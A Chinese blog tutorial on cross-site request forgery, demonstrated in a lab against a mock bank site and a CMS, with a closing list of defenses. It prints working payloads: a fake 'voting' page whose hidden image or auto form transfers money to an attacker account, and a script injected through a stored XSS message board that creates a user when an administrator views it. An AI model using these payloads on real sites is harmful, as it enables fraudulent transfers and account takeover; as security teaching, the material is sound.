CSRF——跨站请求伪造

已于 2023-11-13 14:31:21 修改
阅读量79 收藏
点赞数
分类专栏: # CSRF 文章标签: csrf 前端 网络安全 web安全 笔记
于 2023-11-13 14:26:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134376487
版权
本文详细介绍了CSRF攻击的工作原理,包括如何利用受害者已登录状态进行转账操作,展示了不同场景下的攻击示例,并探讨了无效和有效的防御措施,如验证Referer、二次验证、HttpOnly和SameSite属性的应用。
摘要由CSDN通过智能技术生成

CSRF原理

漏洞验证

实战

防御

原理

概述

​ 跨站请求伪造(Cross Site Request Forgery,CSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非 本意操作的攻击,攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。

​ 借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,则成功的 CSRF 攻击可以强制用户执行更改状态的请求,例如转移资金、修改密码等操作。如果受害者是管理账户,CSRF 攻击会危及整个Web 应用程序

关键点

  • 受害者没有退出登录,受害者保持身份认证。
  • CSRF 继承了受害者的身份和特权,代表受害者执行非本意的、恶意的操作。
  • CSRF 会借用浏览器中与站点关联的所有身份凭据,例如用户的会话Cookie,IP 地址,Windows 域凭据等。

目标

CSRF 的目标是更改用户账户的状态,攻击者利用CSRF 发送的请求都是更改状态的请求,比如,转账、更改密码,购买商品等等。

CSRF 的场景中,攻击者是没有办法获得服务器的响应

场景:银行账户转账

场景模型

image-20231113100113823

环境演示

搭建模拟银行网站,网站可实现转账操作

网站有 hello 用户、hacker 用户、admin 用户

如 hello 向 admin 用户转账,转帐前

image-20231113104545218

image-20231113104552237

hello 用户向 admin 用户转账 100 元后,hello 用户余额减少 100,admin 用户余额增加 100

image-20231113104800695

image-20231113104816234

GET 请求的虚假网站

转账时抓包

POST /bank/action.php HTTP/1.1
Host: 10.9.47.241
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://10.9.47.241
Connection: close
Referer: http://10.9.47.241/bank/self.php
Cookie: username=hello
Upgrade-Insecure-Requests: 1

username=admin&money=100&submit=%E4%BA%A4%E6%98%93

其中有三个参数:转账目标账户、转账金额、提交

username=admin&money=100&submit=%E4%BA%A4%E6%98%93

构造恶意网站 StealMoney.html,强制受害者向银行网站发送向 hacker 的转账信息

网站代码

<!DOCTYPE html>
<html lang="zh">
<head>
	<meta charset="UTF-8">
	<title>为kunkun投票</title>
</head>
<body>
	<img src="http://10.9.47.241/bank/action.php?username=hacker&money=1000&submit=%E4%BA%A4%E6%98%93">
	<br>
	<img src="https://tse4-mm.cn.bing.net/th/id/OIP-C.joOEwWxB9ZwGNeiECewPeQHaHb?pid=ImgDet&rs=1">
</body>
</html>

当受害者未退出银行网站时访问恶意网站

恶意网站中 <img> 标签中的 scr 属性会自动加载转账 http 请求,此请求是由受害者向服务器发送,受害者并未退出网站登录,会携带网站的验证信息,从而实现向 hacker 转账的操作

image-20231113111935223

image-20231113112047261

hacker 余额 0->1000

image-20231113113412549

POST 请求的虚假网站

在使用 BurpSuite 抓到转账数据包,右键>相关工具>CSRF POC 生成,可以自动生成 CSRF 的 POST 攻击代码

image-20231113112415842

image-20231113112529403

稍加改造

<!DOCTYPE html>
<html lang="zh">
<head>
	<meta charset="UTF-8">
	<title>为kunkun投票</title>
</head>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<img src="https://tse4-mm.cn.bing.net/th/id/OIP-C.joOEwWxB9ZwGNeiECewPeQHaHb?pid=ImgDet&rs=1">
<form action="http://10.9.47.241/bank/action.php" method="POST">
  <input type="hidden" name="username" value="hacker" />
  <input type="hidden" name="money" value="1000" />
  <input type="hidden" name="submit" value="&#164;&#152;&#147;" />
  <input type="submit" value="投票" />
</form>
</body>
</html>

访问恶意网站,点击投票

image-20231113113452936

再次向 hacker 转账 1000

image-20231113113700135

hacker 余额 1000->2000

image-20231113113721972

实战——CSRF与XSS相结合

场景

XSS 环境

利用 XSS 触发CSRF 攻击。因为,可以利用 JS 发送HTTP 请求

此实验完成当管理员查看留言时自动创建用户 gjl

新建用户流程

新建用户

image-20231113132746540

抓包拦截

POST /cms/admin/user.action.php HTTP/1.1
Host: 10.9.47.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: http://10.9.47.148
Connection: close
Referer: http://10.9.47.148/cms/admin/user.add.php?act=add
Cookie: username=admin; userid=1; PHPSESSID=a7ujlgkv6rkuojkifh60vrdq77
Upgrade-Insecure-Requests: 1

act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0

恶意代码构造

根据抓取的数据包构造新建用户的恶意代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.47.148/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=gjl&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

攻击者上传恶意代码

image-20231113140614700

点击提交

image-20231113121102565

管理员浏览器加载恶意代码

管理员点击留言管理界面

image-20231113140708696

成功创建用户

image-20231113140728919

抓包可以看到点击留言管理时自动向服务器发送创建用户的请求,并且携带 Cookie

image-20231113140928780

CSRF 防御

无效防御

  • 使用秘密的 Cookie。
  • 仅接收 POST 请求。
  • 多步交易:多步交易,有可能会被恶意攻击者预测。
  • URL 重写:用户的身份信息会暴露在 URL 中,不建议通过引入另外一个漏洞来解决当前 漏洞。
  • HTTPS:所有安全机制的前提。

有效防御

  • 验证 Referer 字段:

    当前 URL 的上一个 URL;(攻击者也可伪造)

  • 二次验证:

    在关键操作之前,再输入密码或者验证码

  • 添加 Token 验证

  • HttpOnly:某些情况下禁止 JS 脚本访问 Cookie 信息。

    DVWA impossible 难度

  • SameSite:Cookie 属性,浏览器自带安全机制。

gjl_
关注
专栏目录
CSRF——跨站请求伪造攻击
peanut5036的博客
12-04 1223
一般来说,攻击者通过伪造用户的浏览器的请求,向访问一个用户自己曾经认证访问过的网站发送出去,使目标网站接收并误以为是用户的真实操作而去执行命令。常用于盗取账号、转账、发送虚假消息等。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为,网站能够确认请求来源于用户的浏览器,却不能验证请求是否源于用户的真实意愿下的操作行为。
CSRF——跨站请求伪造漏洞
m0_63154316的博客
02-25 358
CSRF概念浅入浅出
网络安全进阶学习第三课——CSRF跨站请求伪造
p36273的博客
07-01 1626
漏洞风险存在;伪装数据操作请求的恶意链接或者页面;诱使用户主动访问或登录恶意链接,触发非法操作;
Web安全——CSRF跨站请求伪造漏洞
2401_84968812的博客
05-13 728
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
基础漏洞系列——CSRF跨站请求伪造
白帽子凯哥哥的博客
05-29 872
跨站请求伪造(英语:Cross-site request forgery),也被称为或者,通常缩写为CSRF或者XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
CSRF(跨站请求伪造)
无痕的博客
01-18 8487
csrf跨站请求伪造介绍、csrf攻击在dvwa环境中的应用
关于 CSRF跨站请求伪造
辉小鱼的博客
09-09 367
攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。. 利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。
基础漏洞——CSRF跨站请求伪造)漏洞
2301_79096184的博客
09-15 295
跨站请求伪造又被为one-clickattack,通常缩写为CSRF或者XSRF是一种挟持用户在当前已经登录的web应用程序上执行非本意的操作的攻击方式。
网络安全学习笔记——跨站请求伪造漏洞(CSRF
just do it
07-24 120
CSRF跨站请求伪造,中危漏洞,与XSS一样,也是属于跨站脚本漏洞。也就是说,攻击者盗用目标身份,以目标的名义进行某些非法操作,能使用目标账户发送文件,获取目标的敏感信息,甚至转移其财产——客户端请求伪造攻击,利用目标Cookies转账,没有获取到目标Cookies,只是利用目标的Cookies尚在存活期,然后进行攻击,与XSS不同,XSS是获取到目标的Cookies之后,然后去进行攻击。
东南大学网络空间安全实验基础——跨站请求伪造攻击实验
07-07
东南大学网络空间安全实验基础——跨站请求伪造攻击实验 本实验报告主要讲述了跨站请求伪造攻击(CSRF)的原理和防御方法。CSRF 攻击是一种常见的网络攻击方式,攻击者可以通过欺骗用户来访问恶意网站,从而达到...
CSRF———— (一)跨站伪造请求漏洞示例
weixin_43102772的博客
03-01 235
一、什么是CSRF 1.1简介 csrf(cross-site request forgery)跨站请求伪造。缩写为CSRF或XSRF。CSRF通过利用受信任用户的请求来利用受信任的网站,简单来说,就是利用用户请求来利用网站。 1.2 CSRF和XSS区别 XSS是利用用户对浏览器的信任 盗取cookie CSRF是利用网站对用户浏览器的信任 对网站发起请求,达到攻击者述求 1.3 CSRF原...
DVWA练习——CSRF跨站请求伪造
haoaaao的博客
01-27 491
一、难度:low (1)随便点击一下change,网页上面已经显示出了修改信息的url值。 (2)直接修改即可: 回车,信息已经修改: 新密码测试成功: (1)点击html打开,然后验证,发现失败 将html文件放在vul同级目录然后打开,验证失败: 抓包可以看到这里的链接是close 将html文件改为ip.html 验证成功 (2) 失败原因: /*** CSRF ————(二)绕过http_referer来源核对_Benjiamin.
DVWA系列(五)——使用Burpsuite进行CSRF跨站请求伪造
橘子女侠
05-05 4836
1. CSRF跨站请求伪造)简介 (1)CSRF CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 (2)CSRF与XSS的区别 ...
Web安全 - 跨站请求伪造CSRF(Cross Site Request Forgery)
最新发布
小工匠
09-29 864
CSRF (Cross-Site Request Forgery,跨站请求伪造) 是一种攻击方式,攻击者诱导用户在不知情的情况下发起非授权的请求。例如,用户在登录某个站点后,攻击者通过社交工程等手段诱使用户点击包含恶意请求的链接,利用用户已登录的状态,发起用户意图之外的操作,如转账、修改账户设置等。:在每次受保护的请求中,服务器生成一个唯一的CSRF Token,注入到表单或请求头中。:对于敏感操作,可以要求用户进行额外的身份验证,如验证码或短信验证,防止攻击者即便利用用户的认证状态,也无法完成关键操作。
前端工程规范-2:JS代码规范(Prettier + ESLint)
Vinca@的博客
09-26 658
Prettier 主要关注代码的格式,而 ESLint 则关注代码的质量和规范。结合使用这两个工具,可以极大地提高代码的可读性和维护性,同时减少潜在的错误和不一致性。
前端面试经验总结2(经典问题篇)
rita_0567的博客
09-28 772
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
grpcweb 客户端请求grpc-java服务器
nddjava的专栏
09-24 421
1. 定义grpc proto文件:HelloWorld.proto。5.grpc-web代理:nginx。3. grpc-web js生成。2. java grpc服务。4. grpc-web代码。
DC00015基于java web校园网上购物系统
黄昏下的黎明的博客
09-24 699
DC00015【含配套文档】基于java web校园网上购物系统。
登录CSRF攻击与强化跨站请求伪造防御策略
这篇研究论文主要探讨了针对跨站请求伪造CSRF)攻击的强化防御策略。跨站请求伪造是一种常见的网络安全漏洞,攻击者能够通过伪造请求,使用户在不知情的情况下执行非预期的操作。文中提出了一种新的CSRF攻击变种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值